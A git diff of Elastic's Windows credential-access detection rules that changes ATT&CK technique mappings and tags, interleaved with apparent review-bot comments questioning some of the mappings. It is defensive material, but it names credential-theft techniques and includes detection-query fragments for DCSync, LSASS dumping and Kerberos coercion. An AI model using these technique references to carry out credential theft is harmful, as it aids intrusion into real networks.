["windows", "endpoint", "system", "m365_defender", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/08/27" [rule] author = ["Elastic"] 
@@ -62,7 +62,19 @@ references = ["https://www.elastic.co/security-labs/katz-and-mouse-game"] risk_score = 73 rule_id = "46b01bb5-cff2-4a00-9f87-c041d9eab554" severity = "high" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Collection", "Tactic: Credential Access", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Windows Security Event Logs", "Data Source: Microsoft Defender for Endpoint", "Data Source: Sysmon", "Data Source: SentinelOne", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Windows Security Event Logs", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: Sysmon", + "Data Source: SentinelOne", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" @@ -96,25 +108,10 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1185" -name = "Browser Session Hijacking" -reference = "https://attack.mitre.org/techniques/T1185/" - -[rule.threat.tactic] -id = "TA0009" -name = "Collection" -reference = "https://attack.mitre.org/tactics/TA0009/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1555" name = "Credentials from Password Stores" reference = "https://attack.mitre.org/techniques/T1555/" - [[rule.threat.technique.subtechnique]] id = "T1555.003" name = "Credentials from Web Browsers" @@ -124,3 +121,5 @@ reference = "https://attack.mitre.org/techniques/T1555/003/" id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" + + diff --git a/rules/windows/credential_access_bruteforce_admin_account.toml b/rules/windows/credential_access_bruteforce_admin_account.toml index 9282a6ec9af..11bbd6482f2 100644 
--- a/rules/windows/credential_access_bruteforce_admin_account.toml +++ b/rules/windows/credential_access_bruteforce_admin_account.toml @@ -2,7 +2,7 @@ creation_date = "2020/08/29" integration = ["system", "windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/03/09" [transform] [[transform.osquery]] @@ -135,18 +135,24 @@ from logs-system.security*, logs-windows.forwarded*, winlogbeat-* metadata _id, [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1110" name = "Brute Force" reference = "https://attack.mitre.org/techniques/T1110/" +[[rule.threat.technique.subtechnique]] +id = "T1110.001" +name = "Password Guessing" +reference = "https://attack.mitre.org/techniques/T1110/001/" [[rule.threat.technique.subtechnique]] id = "T1110.003" name = "Password Spraying" reference = "https://attack.mitre.org/techniques/T1110/003/" + + [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" + diff --git a/rules/windows/credential_access_bruteforce_multiple_logon_failure_same_srcip.toml b/rules/windows/credential_access_bruteforce_multiple_logon_failure_same_srcip.toml index b1d6834d68b..d53b19cc348 100644 --- a/rules/windows/credential_access_bruteforce_multiple_logon_failure_same_srcip.toml +++ b/rules/windows/credential_access_bruteforce_multiple_logon_failure_same_srcip.toml @@ -2,7 +2,7 @@ creation_date = "2020/08/29" integration = ["system", "windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/03/09" [transform] [[transform.osquery]] 
@@ -150,18 +150,24 @@ from logs-system.security*, logs-windows.forwarded*, winlogbeat-* metadata _id, [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1110" name = "Brute Force" reference = "https://attack.mitre.org/techniques/T1110/" +[[rule.threat.technique.subtechnique]] +id = "T1110.001" +name = "Password Guessing" +reference = "https://attack.mitre.org/techniques/T1110/001/" [[rule.threat.technique.subtechnique]] id = "T1110.003" name = "Password Spraying" reference = "https://attack.mitre.org/techniques/T1110/003/" + + [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" + diff --git a/rules/windows/credential_access_cmdline_dump_tool.toml b/rules/windows/credential_access_cmdline_dump_tool.toml index fc208976de4..1c55bf1c603 100644 --- a/rules/windows/credential_access_cmdline_dump_tool.toml +++ b/rules/windows/credential_access_cmdline_dump_tool.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/24" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel", "system"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/09/11" [rule] author = ["Elastic"] 
@@ -65,7 +65,20 @@ references = [ risk_score = 73 rule_id = "00140285-b827-4aee-aa09-8113f58a08f3" severity = "high" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Credential Access", "Resources: Investigation Guide", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Windows Security Event Logs", "Data Source: Microsoft Defender for Endpoint", "Data Source: SentinelOne", "Data Source: Sysmon"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Tactic: Defense Evasion", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Windows Security Event Logs", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: SentinelOne", + "Data Source: Sysmon", +] timestamp_override = "event.ingested" type = "eql" @@ -107,12 +120,10 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1003" name = "OS Credential Dumping" reference = "https://attack.mitre.org/techniques/T1003/" - [[rule.threat.technique.subtechnique]] id = "T1003.001" name = "LSASS Memory" @@ -123,7 +134,27 @@ id = "T1003.003" name = "NTDS" reference = "https://attack.mitre.org/techniques/T1003/003/" + + [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1218" +name = "System Binary Proxy Execution" +reference = "https://attack.mitre.org/techniques/T1218/" +[[rule.threat.technique.subtechnique]] +id = "T1218.011" +name = "Rundll32" +reference = "https://attack.mitre.org/techniques/T1218/011/" + + + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + 
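Review bot: The appended Defense Evasion block in `credential_access_cmdline_dump_tool.toml` is laid out differently from the rest of the file: no blank line between `[[rule.threat]]`, `[[rule.threat.technique]]` and the subtechnique table, then three blank lines before `[rule.threat.tactic]`, while the hunk also strips the single blank lines the existing Credential Access block had. TOML does not care, but the rule files elsewhere in this patch use one blank line between tables, so committing the normalised layout now avoids a reformatting churn later. The `T1218.011` Rundll32 mapping itself is plausible for comsvcs.dll MiniDump-style dumping, though the query body that would confirm rundll32 is actually matched sits outside the hunk.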
diff --git a/rules/windows/credential_access_dcsync_newterm_subjectuser.toml b/rules/windows/credential_access_dcsync_newterm_subjectuser.toml index f694907853e..84f640f4534 100644 --- a/rules/windows/credential_access_dcsync_newterm_subjectuser.toml +++ b/rules/windows/credential_access_dcsync_newterm_subjectuser.toml @@ -2,7 +2,7 @@ creation_date = "2022/12/19" integration = ["windows", "system"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/11/14" [rule] author = ["Elastic"] @@ -80,7 +80,17 @@ Audit Directory Service Access (Success,Failure) ``` """ severity = "high" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Use Case: Active Directory Monitoring", "Tactic: Credential Access", "Data Source: Active Directory", "Resources: Investigation Guide", "Data Source: Windows Security Event Logs"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Tactic: Privilege Escalation", + "Use Case: Active Directory Monitoring", + "Data Source: Active Directory", + "Resources: Investigation Guide", + "Data Source: Windows Security Event Logs", +] timestamp_override = "event.ingested" type = "new_terms" 
@@ -96,21 +106,39 @@ event.code:"4662" and host.os.type:"windows" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1003" name = "OS Credential Dumping" reference = "https://attack.mitre.org/techniques/T1003/" - [[rule.threat.technique.subtechnique]] id = "T1003.006" name = "DCSync" reference = "https://attack.mitre.org/techniques/T1003/006/" + + [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" +[[rule.threat.technique.subtechnique]] +id = "T1078.002" +name = "Domain Accounts" +reference = "https://attack.mitre.org/techniques/T1078/002/" + + + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" + [rule.new_terms] field = "new_terms_fields" value = ["winlog.event_data.SubjectUserName"] diff --git a/rules/windows/credential_access_dcsync_replication_rights.toml b/rules/windows/credential_access_dcsync_replication_rights.toml index 63a8203908d..43c9f1c9b13 100644 --- a/rules/windows/credential_access_dcsync_replication_rights.toml +++ b/rules/windows/credential_access_dcsync_replication_rights.toml @@ -2,7 +2,7 @@ creation_date = "2022/02/08" integration = ["system", "windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/09/11" [rule] author = ["Elastic"] 
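Review bot: The new Privilege Escalation entry maps a DCSync detection (`event.code:"4662"` per the hunk header) to `T1078.002` Domain Accounts. DCSync is performed with an account that already holds replication rights; it does not itself elevate that account, so `T1078.002` under `TA0004` describes the precondition rather than the behaviour the rule fires on. If the point is that the newly seen `SubjectUserName` is an already-privileged account, say so in the commit or keep the mapping to `T1003.006` under Credential Access only; the tags hunk adds `"Tactic: Privilege Escalation"` consistently, so both places move together whichever way this goes.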
@@ -87,7 +87,17 @@ Audit Directory Service Access (Success,Failure) ``` """ severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Credential Access", "Data Source: Active Directory", "Resources: Investigation Guide", "Use Case: Active Directory Monitoring", "Data Source: Windows Security Event Logs"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Tactic: Privilege Escalation", + "Data Source: Active Directory", + "Resources: Investigation Guide", + "Use Case: Active Directory Monitoring", + "Data Source: Windows Security Event Logs", +] timestamp_override = "event.ingested" type = "new_terms" @@ -104,21 +114,39 @@ host.os.type:"windows" and event.code:"4662" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1003" name = "OS Credential Dumping" reference = "https://attack.mitre.org/techniques/T1003/" - [[rule.threat.technique.subtechnique]] id = "T1003.006" name = "DCSync" reference = "https://attack.mitre.org/techniques/T1003/006/" + + [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" +[[rule.threat.technique.subtechnique]] +id = "T1078.002" +name = "Domain Accounts" +reference = "https://attack.mitre.org/techniques/T1078/002/" + + + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" + [rule.new_terms] field = "new_terms_fields" value = ["winlog.event_data.SubjectUserSid", "winlog.event_data.ObjectName"] diff --git a/rules/windows/credential_access_dcsync_user_backdoor.toml b/rules/windows/credential_access_dcsync_user_backdoor.toml index 836c3cce9ff..e220648179d 100644 
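Review bot: `credential_access_dcsync_replication_rights.toml` gains the same `T1078.002` Domain Accounts / Privilege Escalation entry as its sibling DCSync rule, and the same doubt applies: the query (`event.code:"4662"` in the hunk header) catches a replication request made with an account that already has the rights, not an account being used to escalate. If the mapping is kept it should carry a stated rationale; if not, remove both the `[[rule.threat]]` block and the `"Tactic: Privilege Escalation",` tag added in the preceding hunk so the two stay in lockstep.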
--- a/rules/windows/credential_access_dcsync_user_backdoor.toml +++ b/rules/windows/credential_access_dcsync_user_backdoor.toml @@ -2,7 +2,7 @@ creation_date = "2024/07/10" integration = ["system", "windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/11/14" [rule] author = ["Elastic"] @@ -78,7 +78,16 @@ references = [ risk_score = 47 rule_id = "f8822053-a5d2-46db-8c96-d460b12c36ac" severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Active Directory", "Use Case: Active Directory Monitoring", "Data Source: Windows Security Event Logs", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Data Source: Active Directory", + "Use Case: Active Directory Monitoring", + "Data Source: Windows Security Event Logs", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "query" 
@@ -97,26 +106,19 @@ event.code:"5136" and host.os.type:"windows" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" +id = "T1003" +name = "OS Credential Dumping" +reference = "https://attack.mitre.org/techniques/T1003/" +[[rule.threat.technique.subtechnique]] +id = "T1003.006" +name = "DCSync" +reference = "https://attack.mitre.org/techniques/T1003/006/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" [rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" + diff --git a/rules/windows/credential_access_disable_kerberos_preauth.toml b/rules/windows/credential_access_disable_kerberos_preauth.toml index 75151aa640e..f69365d6a48 100644 --- a/rules/windows/credential_access_disable_kerberos_preauth.toml +++ b/rules/windows/credential_access_disable_kerberos_preauth.toml @@ -2,7 +2,7 @@ creation_date = "2022/01/24" integration = ["system", "windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] 
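Review bot: The mapping in `credential_access_dcsync_user_backdoor.toml` changes from `T1098` Account Manipulation (Persistence and Privilege Escalation) to `T1003.006` DCSync, but the query still keys on `event.code:"5136"` (directory object modified, per the hunk header), i.e. the act of granting replication rights to a principal, not a replication request. `T1003.006` describes the DCSync request itself; the rights grant is the account-manipulation step that enables it, which is what the old mapping captured. Unless the goal is purely to group this rule with the other DCSync rules, keep the `T1098` block alongside or instead of `T1003.006`, and mirror that in the tags hunk, which now lists only `"Tactic: Credential Access"`.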
@@ -68,7 +68,18 @@ Audit User Account Management (Success,Failure) ``` """ severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Credential Access", "Resources: Investigation Guide", "Use Case: Active Directory Monitoring", "Data Source: Active Directory", "Data Source: Windows Security Event Logs"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Tactic: Defense Evasion", + "Tactic: Privilege Escalation", + "Resources: Investigation Guide", + "Use Case: Active Directory Monitoring", + "Data Source: Active Directory", + "Data Source: Windows Security Event Logs", +] timestamp_override = "event.ingested" type = "eql" 
@@ -80,18 +91,48 @@ any where host.os.type == "windows" and event.code == "4738" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1558" name = "Steal or Forge Kerberos Tickets" reference = "https://attack.mitre.org/techniques/T1558/" - [[rule.threat.technique.subtechnique]] id = "T1558.004" name = "AS-REP Roasting" reference = "https://attack.mitre.org/techniques/T1558/004/" + + [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1562" +name = "Impair Defenses" +reference = "https://attack.mitre.org/techniques/T1562/" + + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" +[[rule.threat.technique.subtechnique]] +id = "T1078.002" +name = "Domain Accounts" +reference = "https://attack.mitre.org/techniques/T1078/002/" + + + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" + diff --git a/rules/windows/credential_access_dnsnode_creation.toml b/rules/windows/credential_access_dnsnode_creation.toml index 565abdd5b21..4dd21727dec 100644 --- a/rules/windows/credential_access_dnsnode_creation.toml +++ b/rules/windows/credential_access_dnsnode_creation.toml @@ -2,7 +2,7 @@ creation_date = "2024/03/26" integration = ["system", "windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] 
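Review bot: Of the two tactics appended to `credential_access_disable_kerberos_preauth.toml`, `T1562` Impair Defenses is listed without a sub-technique and `T1078.002` Domain Accounts is placed under Privilege Escalation; clearing pre-authentication on an account (`event.code == "4738"` in the hunk header) is the setup for AS-REP roasting and does not by itself use a domain account to escalate. If Privilege Escalation is intended, the rationale should be stated; otherwise the existing Credential Access entry already covers the behaviour. The two tags added in the preceding hunk (`"Tactic: Defense Evasion"`, `"Tactic: Privilege Escalation"`) must track whatever tactic set is finally kept.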
@@ -83,7 +83,16 @@ Set-AuditRule -AdObjectPath 'AD:\\CN=MicrosoftDNS,DC=DomainDNSZones,DC=Domain,DC ``` """ severity = "low" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Collection", "Tactic: Credential Access", "Data Source: Active Directory", "Use Case: Active Directory Monitoring", "Data Source: Windows Security Event Logs", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Data Source: Active Directory", + "Use Case: Active Directory Monitoring", + "Data Source: Windows Security Event Logs", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" @@ -95,26 +104,14 @@ any where host.os.type == "windows" and event.code == "5137" and winlog.event_da [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1557" name = "Adversary-in-the-Middle" reference = "https://attack.mitre.org/techniques/T1557/" -[rule.threat.tactic] -id = "TA0009" -name = "Collection" -reference = "https://attack.mitre.org/tactics/TA0009/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1557" -name = "Adversary-in-the-Middle" -reference = "https://attack.mitre.org/techniques/T1557/" [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" + diff --git a/rules/windows/credential_access_dollar_account_relay.toml b/rules/windows/credential_access_dollar_account_relay.toml index 502e066b3aa..c0418104f42 100644 --- a/rules/windows/credential_access_dollar_account_relay.toml +++ b/rules/windows/credential_access_dollar_account_relay.toml @@ -2,7 +2,7 @@ creation_date = "2024/07/24" integration = ["system", "windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/11" [rule] author = ["Elastic"] 
@@ -92,13 +92,24 @@ authentication where host.os.type == "windows" and event.code in ("4624", "4625" [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1187" +name = "Forced Authentication" +reference = "https://attack.mitre.org/techniques/T1187/" [[rule.threat.technique]] id = "T1557" name = "Adversary-in-the-Middle" reference = "https://attack.mitre.org/techniques/T1557/" +[[rule.threat.technique.subtechnique]] +id = "T1557.001" +name = "LLMNR/NBT-NS Poisoning and SMB Relay" +reference = "https://attack.mitre.org/techniques/T1557/001/" + + [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" + diff --git a/rules/windows/credential_access_dollar_account_relay_kerberos.toml b/rules/windows/credential_access_dollar_account_relay_kerberos.toml index 60bb3d0ce29..0a76152c2fc 100644 --- a/rules/windows/credential_access_dollar_account_relay_kerberos.toml +++ b/rules/windows/credential_access_dollar_account_relay_kerberos.toml @@ -2,7 +2,7 @@ creation_date = "2025/06/18" integration = ["system", "windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/10/17" [rule] author = ["Elastic"] @@ -106,7 +106,6 @@ sequence by winlog.computer_name, source.ip with maxspan=5s [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1187" name = "Forced Authentication" @@ -116,8 +115,15 @@ reference = "https://attack.mitre.org/techniques/T1187/" id = "T1557" name = "Adversary-in-the-Middle" reference = "https://attack.mitre.org/techniques/T1557/" +[[rule.threat.technique.subtechnique]] +id = "T1557.001" +name = "LLMNR/NBT-NS Poisoning and SMB Relay" +reference = "https://attack.mitre.org/techniques/T1557/001/" + + [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" + 
diff --git a/rules/windows/credential_access_domain_backup_dpapi_private_keys.toml b/rules/windows/credential_access_domain_backup_dpapi_private_keys.toml index 775ef530d84..25f74db6270 100644 --- a/rules/windows/credential_access_domain_backup_dpapi_private_keys.toml +++ b/rules/windows/credential_access_domain_backup_dpapi_private_keys.toml @@ -2,7 +2,7 @@ creation_date = "2020/08/13" integration = ["endpoint", "windows", "sentinel_one_cloud_funnel", "m365_defender", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] @@ -57,18 +57,24 @@ file where host.os.type == "windows" and event.type != "deletion" and file.name [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1552" name = "Unsecured Credentials" reference = "https://attack.mitre.org/techniques/T1552/" - [[rule.threat.technique.subtechnique]] id = "T1552.004" name = "Private Keys" reference = "https://attack.mitre.org/techniques/T1552/004/" + +[[rule.threat.technique]] +id = "T1555" +name = "Credentials from Password Stores" +reference = "https://attack.mitre.org/techniques/T1555/" + + [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" + diff --git a/rules/windows/credential_access_generic_localdumps.toml b/rules/windows/credential_access_generic_localdumps.toml index 82ee68e5f2d..01dd1f39038 100644 --- a/rules/windows/credential_access_generic_localdumps.toml +++ b/rules/windows/credential_access_generic_localdumps.toml @@ -2,7 +2,7 @@ creation_date = "2022/08/28" integration = ["endpoint", "windows", "m365_defender"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] 
@@ -66,7 +66,17 @@ references = [ risk_score = 47 rule_id = "220be143-5c67-4fdb-b6ce-dd6826d024fd" severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Credential Access", "Tactic: Defense Evasion", "Data Source: Elastic Defend", "Data Source: Elastic Endgame", "Data Source: Sysmon", "Data Source: Microsoft Defender for Endpoint", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame", + "Data Source: Sysmon", + "Data Source: Microsoft Defender for Endpoint", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" @@ -83,31 +93,31 @@ registry where host.os.type == "windows" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1003" name = "OS Credential Dumping" reference = "https://attack.mitre.org/techniques/T1003/" - [[rule.threat.technique.subtechnique]] id = "T1003.001" name = "LSASS Memory" reference = "https://attack.mitre.org/techniques/T1003/001/" + + [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" - [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1112" name = "Modify Registry" reference = "https://attack.mitre.org/techniques/T1112/" + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/windows/credential_access_iis_connectionstrings_dumping.toml b/rules/windows/credential_access_iis_connectionstrings_dumping.toml index 7775110a00d..ad8287b9688 100644 --- a/rules/windows/credential_access_iis_connectionstrings_dumping.toml +++ b/rules/windows/credential_access_iis_connectionstrings_dumping.toml 
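Review bot: The tags hunk for `credential_access_generic_localdumps.toml` drops `"Tactic: Defense Evasion"`, but the threat hunk on the same line keeps the `[[rule.threat]]` block with `T1112` Modify Registry under `TA0005` Defense Evasion (only blank lines change there). The file now has a threat tactic with no matching tag, which a tag/tactic consistency check will reject. Either restore `"Tactic: Defense Evasion",` in the tags list or remove the T1112 block; since the query is `registry where ...` per the hunk header, keeping the tag looks right.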
@@ -2,7 +2,7 @@ creation_date = "2020/08/18" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] @@ -95,18 +95,14 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1552" -name = "Unsecured Credentials" -reference = "https://attack.mitre.org/techniques/T1552/" +id = "T1003" +name = "OS Credential Dumping" +reference = "https://attack.mitre.org/techniques/T1003/" -[[rule.threat.technique.subtechnique]] -id = "T1552.001" -name = "Credentials In Files" -reference = "https://attack.mitre.org/techniques/T1552/001/" [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" + diff --git a/rules/windows/credential_access_kerberos_coerce.toml b/rules/windows/credential_access_kerberos_coerce.toml index e1d5f33af2f..0ddf57939c2 100644 --- a/rules/windows/credential_access_kerberos_coerce.toml +++ b/rules/windows/credential_access_kerberos_coerce.toml @@ -2,7 +2,7 @@ creation_date = "2025/06/14" integration = ["system", "windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/11/14" [rule] author = ["Elastic"] 
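Review bot: Replacing `T1552.001` / `Credentials In Files` with the parent `T1003` / `OS Credential Dumping` in `credential_access_iis_connectionstrings_dumping.toml` loses the more specific mapping, and the rule's subject as its filename suggests (connection strings held in IIS configuration) reads as unsecured credentials in files rather than OS credential dumping, which ATT&CK scopes to OS credential stores. Unless this is a deliberate re-scope, keeping `T1552` with the `T1552.001` sub-technique looks like the more accurate choice; if both are wanted they can coexist as separate `[[rule.threat.technique]]` tables under the same `[rule.threat.tactic]`. A one-line rationale in the commit message would help the next reviewer, since nothing in the hunk explains the change.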
@@ -103,18 +103,24 @@ host.os.type:"windows" and [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1557" +name = "Adversary-in-the-Middle" +reference = "https://attack.mitre.org/techniques/T1557/" +[[rule.threat.technique.subtechnique]] +id = "T1557.001" +name = "LLMNR/NBT-NS Poisoning and SMB Relay" +reference = "https://attack.mitre.org/techniques/T1557/001/" + [[rule.threat.technique]] id = "T1187" name = "Forced Authentication" reference = "https://attack.mitre.org/techniques/T1187/" -[[rule.threat.technique]] -id = "T1557" -name = "Adversary-in-the-Middle" -reference = "https://attack.mitre.org/techniques/T1557/" [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" + diff --git a/rules/windows/credential_access_kerberos_coerce_dns.toml b/rules/windows/credential_access_kerberos_coerce_dns.toml index 105f030b494..0269e12bbd3 100644 --- a/rules/windows/credential_access_kerberos_coerce_dns.toml +++ b/rules/windows/credential_access_kerberos_coerce_dns.toml @@ -2,7 +2,7 @@ creation_date = "2025/06/14" integration = ["endpoint", "windows", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/06/14" [transform] [[transform.investigate]] 
@@ -95,13 +95,24 @@ network where host.os.type == "windows" and dns.question.name : "*UWhRC*BAAAA*" [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1557" +name = "Adversary-in-the-Middle" +reference = "https://attack.mitre.org/techniques/T1557/" +[[rule.threat.technique.subtechnique]] +id = "T1557.001" +name = "LLMNR/NBT-NS Poisoning and SMB Relay" +reference = "https://attack.mitre.org/techniques/T1557/001/" + [[rule.threat.technique]] id = "T1187" name = "Forced Authentication" reference = "https://attack.mitre.org/techniques/T1187/" + [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" + diff --git a/rules/windows/credential_access_kirbi_file.toml b/rules/windows/credential_access_kirbi_file.toml index 216c0590ebc..8f5e1c47d75 100644 --- a/rules/windows/credential_access_kirbi_file.toml +++ b/rules/windows/credential_access_kirbi_file.toml @@ -2,7 +2,7 @@ creation_date = "2023/08/23" integration = ["endpoint", "windows", "sentinel_one_cloud_funnel", "m365_defender", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] @@ -85,13 +85,19 @@ file where host.os.type == "windows" and event.type == "creation" and file.exten [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1003" +name = "OS Credential Dumping" +reference = "https://attack.mitre.org/techniques/T1003/" [[rule.threat.technique]] id = "T1558" name = "Steal or Forge Kerberos Tickets" reference = "https://attack.mitre.org/techniques/T1558/" + [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" + diff --git a/rules/windows/credential_access_ldap_attributes.toml 